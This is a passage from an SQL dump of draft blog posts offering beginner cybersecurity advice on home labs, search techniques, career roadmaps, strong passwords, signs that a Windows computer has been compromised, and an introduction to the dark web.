Practice using different tools and techniques, and explore various cybersecurity concepts.</li>\r\n 	<li><strong>Set Up Vulnerable Environments:</strong> You can find intentionally vulnerable virtual machines online (like OWASP Broken Web Applications) to practice your hacking skills in a safe setting.</li>\r\n 	<li><strong>Capture the Flag (CTF) Challenges:</strong> Participate in online CTF competitions to test your skills and learn from others.</li>\r\n</ul>\r\n<strong>Key Considerations:</strong>\r\n<ul>\r\n 	<li><strong>Legality:</strong> Ensure that all your activities within your home lab are legal and ethical. Practice only on systems you own or have explicit permission to test.</li>\r\n 	<li><strong>Security:</strong> Isolate your home lab from your primary network to prevent any accidental damage or security breaches. Consider using a dedicated network for your lab.</li>\r\n 	<li><strong>Note-Taking:</strong> Maintain detailed notes of your experiments, commands, and findings. Use note-taking apps like KeepNote, CherryTree, or Joplin, and a screenshot tool like Greenshot.</li>\r\n</ul>\r\nCreating a home lab is an investment in your cybersecurity journey. It provides a hands-on learning experience that goes beyond theory. By experimenting and practicing in your lab, you\'ll gain valuable skills and knowledge that can be applied to real-world scenarios.\r\n\r\n<strong>Disclaimer:</strong> Information provided in this response that is not directly cited is based on general knowledge about cybersecurity and home labs and may be subject to change. Verifying and staying updated on current best practices for setting up and using a home lab for cybersecurity purposes is recommended.\r\n\r\n</div>', '', NULL, NULL, 1, 'draft', '2024-11-26 23:10:12', '2026-01-12 21:41:44', 'Information Security', 'Create Your HomeLab for Cybersecurity', '', NULL),
(97, 'Advanced Search Techniques', 'advanced-search-techniques', '<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Google Dorks: The Power of Precision Searching</h3>\r\nGoogle Dorks, a technique popularized in the mid-2000s, is a powerful tool for advanced information gathering. This method allows you to perform highly specific searches within Google\'s vast index, often revealing information that should not be publicly accessible. Some key applications include:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Searching within specific websites</li>\r\n 	<li>Finding database outputs containing sensitive keywords (e.g., \"pw\", \"session key\", \"session id\")</li>\r\n 	<li>Locating potentially exposed admin panels</li>\r\n</ul>\r\nMastering Google Dorks can significantly enhance your ability to conduct thorough research and uncover hidden information. Keep the legal line clear, though: reading what a search engine has already indexed is one thing, but logging in to an exposed admin panel, downloading a leaked database or using credentials you stumble upon is unauthorized access in most jurisdictions. Restrict dorking to assets you own or are explicitly authorized to test, and report accidental findings to the owner rather than exploring them.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Password Security Research</h3>\r\nIn an era of frequent data breaches, it\'s crucial to verify the security of your passwords. Here are some valuable resources:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li><strong>Have I Been Pwned</strong>: A website by Troy Hunt that allows you to check if your email or password has been compromised in known data breaches. Its Pwned Passwords check is designed so that only the first five characters of your password\'s SHA-1 hash leave your browser (k-anonymity), so the service never sees the password itself</li>\r\n 	<li><strong>Bridgedirectory.org</strong>: This site can reveal the first few characters of exposed passwords associated with an email address. Use any such lookup service with care: you are handing it the very email address you are querying, and a partial password tied to an email is itself sensitive data, so only query addresses you control and never type a current password into a third-party site</li>\r\n</ul>\r\nThese tools are not just for personal use; they can be instrumental in raising awareness about password security among colleagues and friends.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Automation and Tool Utilization</h3>\r\nIn today\'s AI-driven world, automation skills are indispensable. 
Here\'s how you can stay ahead:\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Finding and Using Tools</h3>\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li><strong>GitHub Exploration</strong>: Utilize GitHub\'s search features to discover new security tools and libraries</li>\r\n 	<li><strong>Octotrends.com</strong>: This site lists trending GitHub repositories, helping you stay updated with the latest tools and projects</li>\r\n</ul>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Leveraging AI for Coding</h3>\r\nEven if you\'re not a full-time developer, basic coding skills can be incredibly useful in cybersecurity. Modern AI tools can significantly boost your coding efficiency:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li><strong>GPT models</strong>: These can help with writing and debugging code, often solving in hours what might take days manually</li>\r\n 	<li><strong>Copilots and Code Whisperers</strong>: These AI assistants can provide real-time coding suggestions and solutions</li>\r\n</ul>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Social Engineering Awareness</h3>\r\nUnderstanding social engineering is crucial in the IT sector. Developing \"soft skills\" or interpersonal skills is vital for recognizing and mitigating social engineering threats\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Continuous Learning and Adaptation</h3>\r\nThe field of cybersecurity is ever-evolving. 
Stay current by:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Regularly exploring new tools and techniques</li>\r\n 	<li>Engaging with online communities and forums</li>\r\n 	<li>Practicing ethical hacking on legal training platforms such as TryHackMe or Hack The Box, never on systems you do not own or have written permission to test</li>\r\n</ul>\r\nRemember, the goal is not to become an expert in every area but to develop a well-rounded understanding that complements your primary role and enhances your digital security awareness. By incorporating these skills and mindsets into your professional toolkit, you\'ll not only boost your cybersecurity proficiency but also increase your value in any IT-related field. Stay curious, keep learning, and always prioritize the ethical use of these powerful tools and techniques.', '', NULL, NULL, 1, 'draft', '2024-11-25 22:54:51', '2026-01-12 21:41:44', 'Information Security', 'Advanced Search Techniques', '', NULL),
(98, 'Cybersecurity Roadmap for Beginners', 'cybersecurity-roadmap-for-beginners', 'Cybersecurity has become a cornerstone of digital safety, safeguarding individuals, organizations, and nations from ever-evolving threats. For aspiring professionals and seasoned experts alike, charting a clear path in this dynamic field is essential. A well-structured cybersecurity roadmap serves as a guide, breaking down complex topics into manageable steps and aligning them with industry requirements. Whether you\'re exploring foundational skills like networking and system security or advanced domains such as penetration testing and incident response, this roadmap is designed to help you build a resilient, future-proof cybersecurity career.\r\n\r\n<strong>1. Understanding Cybersecurity</strong>\r\n<ul>\r\n 	<li><strong>Definition:</strong> Cybersecurity is the practice of protecting computers, servers, mobile devices, electronic systems, networks, and data from malicious attacks.</li>\r\n 	<li><strong>Importance:</strong> Cybersecurity is crucial because a successful cyberattack can have severe consequences, including financial loss, data breaches, reputational damage, and legal/compliance issues.</li>\r\n</ul>\r\n<strong>2. 
Getting Started</strong>\r\n<ul>\r\n 	<li><strong>Formal Education:</strong> A bachelor\'s degree in cybersecurity, computer science, or information technology provides a solid foundation.</li>\r\n 	<li><strong>Certifications:</strong> Industry-recognized certifications, such as CompTIA Security+ and Network+, demonstrate competency and commitment to the field.</li>\r\n 	<li><strong>Essential Skills:</strong>\r\n<ul>\r\n 	<li><strong>Technical Skills:</strong> Networking concepts (TCP/IP, DNS, VPNs), security tools (firewalls, IDS/IPS, SIEM), operating systems (Windows, Linux), and programming languages (Python, Bash).</li>\r\n 	<li><strong>Soft Skills:</strong> Analytical thinking, problem-solving, communication, and teamwork.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<strong>3. Developing Core Competencies</strong>\r\n<ul>\r\n 	<li><strong>Networking and Security Protocols:</strong> Master the TCP/IP model, firewalls, VPNs, and network segmentation.</li>\r\n 	<li><strong>Cybersecurity Frameworks and Standards:</strong> Understand NIST, CIS, and ISO 27001 frameworks.</li>\r\n 	<li><strong>Programming for Cybersecurity:</strong> Learn Python or Bash for automation and scripting.</li>\r\n</ul>\r\n<strong>4. Advancing Your Career</strong>\r\n<ul>\r\n 	<li><strong>Specialize in a Domain:</strong> Choose a specific area of interest, such as penetration testing, SOC analysis, threat intelligence, or incident response.</li>\r\n 	<li><strong>Networking and Mentorship:</strong> Connect with professionals in the field, attend conferences, and seek guidance from mentors.</li>\r\n 	<li><strong>Continuous Learning:</strong> Stay updated on the latest threats and technologies by pursuing advanced certifications, attending training, and reading industry publications.</li>\r\n</ul>\r\n<strong>5. 
Exploring Cybersecurity Roles</strong>\r\n<ul>\r\n 	<li><strong>Security Operations Center (SOC) Analyst:</strong> Monitors security systems, analyzes alerts, and responds to incidents.</li>\r\n 	<li><strong>Penetration Tester:</strong> Identifies and exploits vulnerabilities in systems and applications.</li>\r\n 	<li><strong>Threat Intelligence Analyst:</strong> Gathers and analyzes information about potential threats.</li>\r\n 	<li><strong>Incident Responder:</strong> Investigates and contains security breaches.</li>\r\n 	<li><strong>Security Engineer:</strong> Designs, implements, and manages security solutions.</li>\r\n 	<li><strong>Security Consultant:</strong> Advises organizations on security best practices.</li>\r\n</ul>\r\n<strong>6. Building a Personal Brand</strong>\r\n<ul>\r\n 	<li><strong>Creating a Cybersecurity Portfolio:</strong> Showcase your skills and experience through case studies, blog posts, presentations, and open-source contributions.</li>\r\n 	<li><strong>Blogging and Content Creation:</strong> Share your knowledge and insights through blogging and social media.</li>\r\n 	<li><strong>Networking:</strong> Use social media to connect with professionals and build relationships.</li>\r\n</ul>\r\n<strong>7. Landing Your First Job</strong>\r\n<ul>\r\n 	<li><strong>Building a Strong Resume and Portfolio:</strong> Highlight relevant skills, certifications, and practical experience.</li>\r\n 	<li><strong>Job Search Strategies:</strong> Utilize online job boards, networking events, and company websites.</li>\r\n</ul>\r\n<strong>8. Incident Response</strong>\r\n<ul>\r\n 	<li>Develop and test an incident response plan.</li>\r\n 	<li>Implement procedures for detecting and responding to various types of attacks.</li>\r\n 	<li>Train employees on cybersecurity awareness and best practices.</li>\r\n</ul>\r\n<strong>9. 
Advanced Skills for Cybersecurity Analyst L2</strong>\r\n<ul>\r\n 	<li><strong>Forensic Investigation:</strong> Memory analysis, disk imaging, and log analysis.</li>\r\n 	<li><strong>Vulnerability Management:</strong> Vulnerability scanning, risk assessment, and remediation.</li>\r\n 	<li><strong>Advanced Malware Analysis:</strong> Reverse engineering, sandboxing, and behavioral analysis.</li>\r\n 	<li><strong>Cloud Security:</strong> Securing cloud platforms (AWS, Azure, Google Cloud).</li>\r\n 	<li><strong>Compliance and Governance:</strong> Understanding cybersecurity frameworks, policies, and regulations.</li>\r\n</ul>\r\n<strong>10. The Cybersecurity Hero\'s Journey</strong>\r\n<ul>\r\n 	<li><strong>Dedication and Persistence:</strong> Cybersecurity requires ongoing effort and a commitment to learning.</li>\r\n 	<li><strong>Embrace Challenges:</strong> View challenges as opportunities for growth.</li>\r\n 	<li><strong>Adaptability:</strong> Stay flexible and embrace new technologies and approaches.</li>\r\n 	<li><strong>Collaboration:</strong> Work effectively with others to achieve common goals.</li>\r\n 	<li><strong>Passion for Protecting Digital Assets:</strong> A genuine desire to make a positive impact is essential.</li>\r\n 	<li><strong>Personalize Your Journey:</strong> Tailor your career path to align with your interests and goals.</li>\r\n 	<li><strong>Build a Support Network:</strong> Seek guidance from mentors, peers, and colleagues.</li>\r\n 	<li><strong>Celebrate Your Achievements:</strong> Acknowledge your progress and successes.</li>\r\n</ul>\r\nThis roadmap offers a comprehensive overview of the path to becoming a cybersecurity professional. Remember your journey may vary based on your specific interests, skills, and goals.\r\n\r\nSoon I will create a very detailed PDF for this journey. Good luck !', '', NULL, NULL, 1, 'draft', '2024-11-18 17:16:46', '2026-01-12 21:41:44', 'Information Security', 'Cybersecurity Roadmap for Beginners', '', NULL),
(99, 'The Importance of Using Strong, Unique Passwords', 'the-importance-of-using-strong-unique-passwords', '<p class=\"mb-2 last:mb-0\">We rely heavily on various online platforms for work, entertainment, and daily life. From emails to banking to social media, our lives are intertwined with these digital services. However, the convenience of these platforms also comes with risks, such as data breaches and cyberattacks. One of the most critical ways to protect your information is by using strong, unique passwords.</p>\r\n\r\n<h4><strong>Tips for Creating Strong, Unique Passwords</strong></h4>\r\n<p class=\"mb-2 last:mb-0\">Creating strong, unique passwords can be challenging, but there are several strategies you can use:</p>\r\n\r\n<ol>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Use a Password Manager:</strong> Tools like LastPass or 1Password help generate and store complex passwords for all your accounts. These managers not only ensure that your passwords are secure but also reduce the risk of forgetting them. A manager is only as safe as the master password and account that protect it, so choose a long master passphrase you use nowhere else, turn on two-factor authentication for the manager itself, and prefer a product that publishes independent security audits.</p>\r\n\r\n<ul>\r\n 	<li><a class=\"text-blue-500 text-sm hover:underline\" href=\"https://www.lastpass.com/\" target=\"_blank\" rel=\"noopener noreferrer\">LastPass</a></li>\r\n 	<li><a class=\"text-blue-500 text-sm hover:underline\" href=\"https://1password.com/\" target=\"_blank\" rel=\"noopener noreferrer\">1Password</a></li>\r\n</ul>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Implement the Password Formula:</strong> Create a base password using a combination of letters (both upper and lower case), numbers, and special characters. For example: <code class=\"undefined font-semibold\">G7#xY9@q</code>. Note that this example shows the character mix, not an adequate length: eight random characters are within reach of offline GPU cracking if the site stores passwords with a fast hash, so aim for at least 12–16 characters and let your password manager generate them.</p>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Use Passphrases:</strong> Replace single words in your password with longer phrases or sentences. Length matters more than symbols: four or more unrelated, randomly chosen words are easier to remember and far harder to guess than a short \"complex\" string, whereas a familiar phrase followed by a year is a pattern cracking tools try early. 
For example: “ILoveMyCat2023!” follows the rule, but it is the kind of guessable pattern (common phrase + year + exclamation mark) that attackers try early; something like “orbit-velvet-cactus-ladder”, built from random unrelated words, is both longer and far less predictable.</p>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Avoid Common Words and Patterns:</strong> Do not use easily guessable words, common sequences like “123456” or “qwerty,” or personal information such as your name or birthday.</p>\r\n</li>\r\n</ol>\r\n<h4><strong>Best Practices for Password Management</strong></h4>\r\n<p class=\"mb-2 last:mb-0\">To maintain the security of your accounts, follow these best practices:</p>\r\n\r\n<ol>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Change Your Password When It May Be Compromised:</strong> Current guidance (NIST SP 800-63B) no longer recommends changing passwords on a fixed schedule, because forced rotation pushes people toward predictable variations of the same password. Instead, change a password immediately when a service reports a breach, when it appears in a breach-lookup tool, or after any suspicious login or phishing attempt, and keep every password unique so that one compromise cannot spread.</p>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Enable Two-Factor Authentication (2FA):</strong> Adding an extra layer of security makes it harder for hackers to gain access even if they manage to steal your password. Setting up 2FA is generally easy and enhances account security significantly. Prefer an authenticator app, a hardware security key or passkeys over SMS codes, which can be intercepted through SIM-swapping, and store your backup codes somewhere safe.</p>\r\n\r\n<ul>\r\n 	<li><a class=\"text-blue-500 text-sm hover:underline\" href=\"https://www.kaspersky.com/resource-center/definitions/two-factor-authentication\" target=\"_blank\" rel=\"noopener noreferrer\">How to Set Up 2FA</a></li>\r\n</ul>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Be Wary of Phishing Attempts:</strong> Never share your passwords with anyone or click on suspicious links in emails. Always verify the source before entering your login information, and reach important sites by typing the address or using a saved bookmark rather than following a link from a message; a password manager that only auto-fills on the genuine domain also helps catch look-alike sites. 
Be cautious of unsolicited emails asking for personal information.</p>\r\n</li>\r\n</ol>\r\n<h4><strong>Worked Examples: What Makes a Password Strong (or Not)</strong></h4>\r\n<p class=\"mb-2 last:mb-0\">Here are some examples, with notes on how well each one actually holds up. Never reuse any of them: a password printed in an article is, by definition, already in attackers\' wordlists.</p>\r\n\r\n<ol>\r\n 	<li><code class=\"undefined font-semibold\">G7#xY9@q</code> – This password uses a mix of uppercase and lowercase letters, numbers, and special characters, but at eight characters it is too short; the same mix at 14–16 characters from a password manager is what to aim for.</li>\r\n 	<li><code class=\"undefined font-semibold\">ILoveMyCat2023!</code> – A passphrase that combines words with a year and an exclamation mark. It is long, but a common phrase plus a year plus a trailing symbol is exactly the pattern that cracking rule sets generate first, so treat it as a weak example.</li>\r\n 	<li><code class=\"undefined font-semibold\">Th3Bl@ckH0rse$</code> – Another passphrase using a creative phrase. The letter-for-symbol substitutions (3 for e, @ for a, 0 for o) are well known to cracking tools and add little real strength; four random unrelated words would be stronger and easier to type.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\">Remember, the longer, less predictable and more unique your passwords are, the better protected your accounts will be; visual complexity on its own does not help.</p>\r\n\r\n<h4><strong>Additional Tips for Enhanced Security</strong></h4>\r\n<ol>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Use Different Passwords for Each Account:</strong> Avoid reusing the same password across multiple platforms. If one account is compromised, attackers can gain access to all other accounts if they use the same password.</p>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Look for Login Protections:</strong> Many websites use a CAPTCHA and rate limiting during login or registration to slow automated attacks. These are controls the site operator applies, not something you can switch on yourself; what you can do is enable login alerts and new-device notifications where offered, and periodically review and sign out of active sessions you do not recognize.</p>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Regularly Update Software and Systems:</strong> Keep your operating system, browsers, and applications up to date with the latest security patches. These updates often include fixes for known vulnerabilities that could be exploited by attackers.</p>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Use Secure Networks:</strong> Avoid using public Wi-Fi networks for sensitive transactions or logging into important accounts. 
If you must use a public network, consider using a Virtual Private Network (VPN) to encrypt your internet connection.</p>\r\n</li>\r\n</ol>', '', NULL, NULL, 1, 'draft', '2024-11-14 17:42:55', '2026-01-12 21:41:44', 'Information Security', 'The Importance of Using Strong, Unique Passwords', '', NULL),
(100, 'How to Tell if Your Computer Has Been Hacked: A Practical Guide with Tools', 'how-to-tell-if-your-computer-has-been-hacked-a-practical-guide-with-tools', 'With the rise in cyber threats, learning to recognize the signs of a hacked computer has become essential for everyone, from everyday users to IT professionals. Here’s an in-depth guide on spotting indicators of compromise (IOCs) and using effective tools to investigate. By following these steps, you can gain insight into whether your system has been compromised and what actions to take next.\r\n<h3>1. <strong>Identify Initial Signs of Compromise</strong></h3>\r\nSpotting suspicious behavior on your computer is the first step in detecting potential threats. Here are some key red flags to watch for:\r\n<ul>\r\n 	<li><strong>Unexpected pop-ups and ads</strong>: If your screen is flooded with intrusive ads, especially when you aren’t browsing the web, it’s a warning sign.</li>\r\n 	<li><strong>Slow system performance</strong>: A significant slowdown in your computer’s performance, including lagging or crashing applications, can indicate malicious processes.</li>\r\n 	<li><strong>Unauthorized changes</strong>: Look out for unrecognized software installations, modified browser settings, or new desktop icons.</li>\r\n 	<li><strong>Abnormal data usage</strong>: Unexplained data usage spikes or frequent data transfers may be a sign of unauthorized access.</li>\r\n 	<li><strong>Disabled antivirus software</strong>: Some malware types will disable your security software, leaving your system vulnerable.</li>\r\n</ul>\r\nIf you experience one or more of these symptoms, proceed with the investigative steps below to verify if your system has been compromised.\r\n<h3>2. <strong>Check Running Processes with Task Manager</strong></h3>\r\nThe <strong>Task Manager</strong> provides a snapshot of your system’s performance and active processes. 
Identifying unknown or suspicious processes can reveal malware, although a process that actively hides itself (a rootkit) will not appear here, so a clean-looking list is not proof of a clean system.\r\n<ul>\r\n 	<li><strong>Steps</strong>:\r\n<ol>\r\n 	<li>Open <strong>Task Manager</strong> by pressing <code>Ctrl + Shift + Esc</code>.</li>\r\n 	<li>Navigate to the <strong>Processes</strong> tab.</li>\r\n 	<li>Check CPU, Memory, and Disk columns to spot processes using high resources.</li>\r\n</ol>\r\n</li>\r\n 	<li><strong>Analyzing Processes</strong>:\r\n<ul>\r\n 	<li><strong>Research unfamiliar processes</strong>: Right-click each process and select <strong>Open file location</strong>, then <strong>Properties</strong>, to view the location and description. The path is often the giveaway: legitimate Windows components live in the Windows system folders, whereas malware frequently runs from Temp, Downloads or a user\'s AppData folder, sometimes under a name that imitates a system process. Check the <strong>Digital Signatures</strong> tab as well; an unsigned binary in an unusual location deserves a closer look.</li>\r\n 	<li><strong>Use VirusTotal</strong>: If you suspect a process, look the file up on <strong>VirusTotal</strong> to check if it’s recognized as malware. Search by hash first: compute the SHA-256 in PowerShell with <code>Get-FileHash</code> and paste it into the search box. Only upload the file itself if no report exists and the file contains nothing sensitive, because uploaded samples are shared with VirusTotal\'s partners and can be downloaded by other researchers.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<strong>VirusTotal</strong>: <a href=\"https://www.virustotal.com\" target=\"_new\" rel=\"noopener\">VirusTotal Website</a>\r\nSearch by hash, or upload suspicious executables, for a multi-engine scan and threat analysis. Never upload documents, spreadsheets or archives that may contain personal or business data.\r\n<h3>3. <strong>Examine Startup Programs with Task Manager and Autoruns</strong></h3>\r\nMalicious software often configures itself to launch at startup to ensure persistence. 
Identifying and disabling unrecognized startup entries can prevent malware from reinitializing.\r\n<ul>\r\n 	<li><strong>Using Task Manager</strong>:\r\n<ol>\r\n 	<li>Go to Task Manager’s <strong>Startup</strong> tab.</li>\r\n 	<li>Review each program and disable anything that looks suspicious or unneeded.</li>\r\n</ol>\r\n</li>\r\n 	<li><strong>Using Autoruns for Advanced Analysis</strong>:\r\n<ul>\r\n 	<li><strong>Autoruns</strong> by Sysinternals offers a comprehensive view of all startup entries.</li>\r\n 	<li>Download Autoruns here: <a href=\"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns\" target=\"_new\" rel=\"noopener\">Autoruns Download</a></li>\r\n 	<li><strong>How to Use</strong>:\r\n<ul>\r\n 	<li>Look through entries under <strong>Logon</strong>, <strong>Scheduled Tasks</strong>, and <strong>Services</strong>.</li>\r\n 	<li>Right-click entries to research them online or check on VirusTotal.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\nAutoruns provides a powerful way to dig into startup programs and detect hidden malware. Be cautious when disabling startup programs, as some may be essential to your system’s operation.\r\n<h3>4. <strong>Inspect Active Services Using Autoruns</strong></h3>\r\nServices running in the background can include unauthorized programs designed to go unnoticed. Using Autoruns, you can analyze these services more effectively than through Task Manager alone.\r\n<ul>\r\n 	<li><strong>Steps</strong>:\r\n<ul>\r\n 	<li>In Autoruns, go to the <strong>Services</strong> tab.</li>\r\n 	<li>Look for services with vague or unfamiliar names, right-click on them, and select <strong>Properties</strong> to investigate further.</li>\r\n 	<li>Submit suspicious files to VirusTotal for a second opinion.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<h3>5. 
<strong>Analyze Network Connections with Command Prompt and Wireshark</strong></h3>\r\nMalware often communicates with external servers, transferring stolen data or receiving commands from the attacker. Use <strong>netstat</strong> and <strong>Wireshark</strong> to monitor network activity.\r\n<ul>\r\n 	<li><strong>Using Command Prompt</strong>:\r\n<ol>\r\n 	<li>Open Command Prompt as an administrator.</li>\r\n 	<li>Type <code>netstat -ano</code> to list all active network connections together with the owning process ID (PID); <code>netstat -anob</code> additionally shows the executable behind each connection.</li>\r\n 	<li>Look for unusual IP addresses or ports, particularly for connections you didn’t initiate, and match the PID against the <strong>Details</strong> tab of Task Manager to identify the responsible program. A connection list is a snapshot, so repeat the command a few times; malware that beacons periodically may not be connected at the moment you look.</li>\r\n</ol>\r\n</li>\r\n 	<li><strong>Using Wireshark for Advanced Network Analysis</strong>:\r\n<ul>\r\n 	<li>Download Wireshark here: <a href=\"https://www.wireshark.org/\" target=\"_new\" rel=\"noopener\">Wireshark Download</a></li>\r\n 	<li><strong>How to Use</strong>: Start capturing network traffic and look for unusual data flows, unfamiliar IPs, or large transfers when your system should be idle. Bear in mind that a compromised host can lie to tools running on it; capturing from the router or from a separate machine on the same network is more trustworthy.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\nWireshark is powerful but can be complex for beginners. It allows you to apply filters to narrow down traffic, making it easier to spot anomalies in your network connections.\r\n<h3>6. <strong>Review Scheduled Tasks for Malicious Activity</strong></h3>\r\nCybercriminals often set up scheduled tasks to run malicious scripts periodically, gaining access and collecting data over time. Checking these scheduled tasks can reveal ongoing threats.\r\n<ul>\r\n 	<li><strong>Steps</strong>:\r\n<ol>\r\n 	<li>Open <strong>Task Scheduler</strong>.</li>\r\n 	<li>Check for tasks with names you don’t recognize or didn’t create, and open each one\'s <strong>Actions</strong> tab to see exactly what program or script it runs and from where.</li>\r\n 	<li>Research suspicious tasks before you disable them: note (or export) the task\'s action, trigger and author first, so that the evidence is preserved and a legitimate task can be restored if you were wrong.</li>\r\n</ol>\r\n</li>\r\n</ul>\r\nRegularly reviewing scheduled tasks can prevent malware from repeatedly launching at specified intervals. For a more detailed overview, Autoruns can also list scheduled tasks.\r\n<h3>7. 
<strong>Advanced Tools for Comprehensive Analysis</strong></h3>\r\nSeveral tools provide in-depth inspection capabilities, including checking files, memory dumps, and sandboxing unknown software.\r\n<ul>\r\n 	<li><strong>VirusTotal</strong>: Submit files for a multi-engine antivirus scan. <a href=\"https://www.virustotal.com\" target=\"_new\" rel=\"noopener\">VirusTotal Website</a></li>\r\n 	<li><strong>Intezer Analyze</strong>: Uses genetic code analysis to detect malware by comparing your files against known threats.\r\n<ul>\r\n 	<li>Access Intezer here: <a target=\"_new\" rel=\"noopener\">Intezer Analyze</a></li>\r\n</ul>\r\n</li>\r\n 	<li><strong>Sandboxing with Any.Run</strong>: Sandboxing tools allow you to test files in isolated environments. Upload files to Any.Run to observe their behavior without risking your system.\r\n<ul>\r\n 	<li>Try Any.Run here: <a href=\"https://any.run\" target=\"_new\" rel=\"noopener\">Any.Run</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\nFor deeper analysis, consider <strong>Volatility</strong> for memory forensics, allowing you to capture a memory dump and look for anomalies. Volatility offers detailed analysis for advanced users with experience in digital forensics.\r\n<h3>8. 
<strong>Use System Monitors to Detect Unauthorized Activity</strong></h3>\r\nSystem monitoring tools like <strong>Process Hacker</strong> and <strong>GlassWire</strong> offer real-time insights into active processes, network connections, and resource usage.\r\n<ul>\r\n 	<li><strong>Process Hacker</strong>: Provides detailed control over system processes and services.\r\n<ul>\r\n 	<li>Download here: <a target=\"_new\" rel=\"noopener\">Process Hacker</a></li>\r\n</ul>\r\n</li>\r\n 	<li><strong>GlassWire</strong>: Monitors your network activity and alerts you to unusual activity.\r\n<ul>\r\n 	<li>Download here: <a href=\"https://www.glasswire.com/\" target=\"_new\" rel=\"noopener\">GlassWire</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\nThese tools are user-friendly and provide additional details beyond Task Manager, making it easier to spot suspicious activity.\r\n<h3>9. <strong>Check Your Security Software for Disablement or Compromise</strong></h3>\r\nSome malware disables or bypasses antivirus software to evade detection. Confirm that your security tools, including antivirus and firewalls, are enabled and functioning.\r\n<ul>\r\n 	<li><strong>Steps</strong>:\r\n<ol>\r\n 	<li>Check your antivirus software’s status and update it if necessary.</li>\r\n 	<li>Open <strong>Windows Security</strong> &gt; <strong>Virus &amp; Threat Protection</strong> to review recent scans and ensure that real-time protection is active.</li>\r\n 	<li>Run a full system scan.</li>\r\n</ol>\r\n</li>\r\n</ul>\r\nIf you notice your antivirus turning off automatically or being unresponsive, this could indicate malware. Consider using a second-opinion scanner, like <strong>Malwarebytes</strong> or <strong>HitmanPro</strong>, for an additional layer of security.\r\n<h3>10. <strong>Perform a System Backup and Secure Sensitive Data</strong></h3>\r\nIf you detect signs of compromise, consider backing up your files before taking further action to protect your data. 
In severe cases, a full system reinstallation may be the most effective way to eliminate malware and start fresh.\r\n<ul>\r\n 	<li><strong>Backup Tips</strong>:\r\n<ul>\r\n 	<li>Use an external drive or a secure cloud storage provider.</li>\r\n 	<li>Disconnect the backup drive from the system after transferring data to prevent malware from spreading to the backup.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\nRegular backups are a preventive measure that ensures you can restore your data in case of a severe attack.', '', NULL, NULL, 1, 'draft', '2024-11-09 20:22:55', '2026-01-12 21:41:44', 'Information Security', 'How to Tell if Your Computer Has Been Hacked: A Practical Guide with Tools', '', NULL),
(101, 'Dark Web and How It Works', 'dark-web-and-how-it-works', 'The internet is vast and complex, with many layers that most everyday users never see. While we\'re familiar with websites we can easily access through search engines like Google, there\'s a hidden part of the internet known as the dark web. Let\'s explore what the dark web is and how it works, in terms that anyone can understand.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">What is the Dark Web?</h3>\r\nThe dark web is a part of the internet that is intentionally hidden and cannot be accessed through regular web browsers or search engines. It\'s a small portion of what\'s called the \"deep web,\" which is all the content on the internet that isn\'t indexed by search engines. To visualize this, imagine the internet as an iceberg:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>The tip of the iceberg, visible above water, represents the \"surface web\" - the websites we use every day.</li>\r\n 	<li>The part of the iceberg just below the water\'s surface is the \"deep web\" - content that requires logins or passwords, like your email or online banking.</li>\r\n 	<li>The very bottom of the iceberg, deep underwater, is the \"dark web\" - a hidden part of the internet that requires special software to access.</li>\r\n</ul>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">How Does the Dark Web Work?</h3>\r\nThe dark web operates on overlay networks called \"darknets.\" These networks sit on top of the regular internet but require specific software, configurations, or authorization to access. 
